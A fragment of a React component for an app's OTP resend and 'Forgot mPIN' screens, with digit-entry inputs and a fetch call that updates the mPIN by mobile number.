                            console.log(res);
                            if (
                              res.message ===
                              "OTP Sent On Your Email ID Successfully"
                            ) {
                              setEmailConfirmErr("OTP Resent On Your Email ID");
                            }
                          })
                          .catch((err) => console.log(err));
                      }}
                    >
                      Didn't receive the Code yet? <br /> Resend Code
                    </Button>
                  </CardBody>
                )}

                {/* UPDATE PASSWORD SECTION */}
                {updatePassword && (
                  <CardBody style={{ textAlign: "center" }}>
                    <h5
                      style={{
                        display: "flex",
                        justifyContent: "center",
                        alignItems: "center",
                      }}
                    >
                      Forgot mPIN
                    </h5>
                    <h6
                      style={{
                        display: "flex",
                        justifyContent: "center",
                        alignItems: "center",
                      }}
                    >
                      Enter New 6-digit mPIN
                    </h6>

                    <div style={containerDigit}>
                      {updatePasswordConfirm.map((digit, index) => (
                        <input
                          key={index}
                          ref={(el) => (inputsUpdate.current[index] = el)}
                          type="text"
                          inputMode="numeric"
                          maxLength={1}
                          value={digit}
                          onChange={(e) => {
                            handlePasswordChangeConfirmUpdate(
                              e.target.value,
                              index,
                            );
                            setUpdatePasswordConfirmErr("");
                          }}
                          onKeyDown={(e) =>
                            handleKeyPressConfirmUpdate(e, index)
                          }
                          style={inputDigit}
                        />
                      ))}
                    </div>

                    <span style={{ color: "red" }}>
                      {updatePasswordConfirmErr}
                    </span>
                    <br />

                    <Button
                      color="transparent"
                      style={{
                        textTransform: "none",
                        justifyContent: "center",
                        alignItems: "center",
                        color: "red",
                      }}
                      onClick={async () => {
                        const password = updatePasswordConfirm.join("");

                        if (password.length !== 6) {
                          setUpdatePasswordConfirmErr(
                            "mPIN must be exactly 6 digits.",
                          );
                          return;
                        }

                        const requestOptions = {
                          method: "PUT",
                          headers: {
                            "Content-Type": "application/json",
                            Accept: "application/json",
                            Authorization: `Basic ${credentials}`,
                          },
                          body: JSON.stringify({ password }),
                        };

                        const response = await fetch(
                          `${localApi}/admin/updatePassword/findByMobile/${mobile}`,
                          requestOptions,
                        );
                        const data = await response.json();

                        if (data.message === "Data Updated Successfully !!!") {
                          window.location.reload(false);
                        }
                      }}
                    >
                      Update mPIN
                    </Button>
                  </CardBody>
                )}
              </Card>
            </form>
          )}
        </GridItem>
      </GridContainer>
    </div>
  );
}
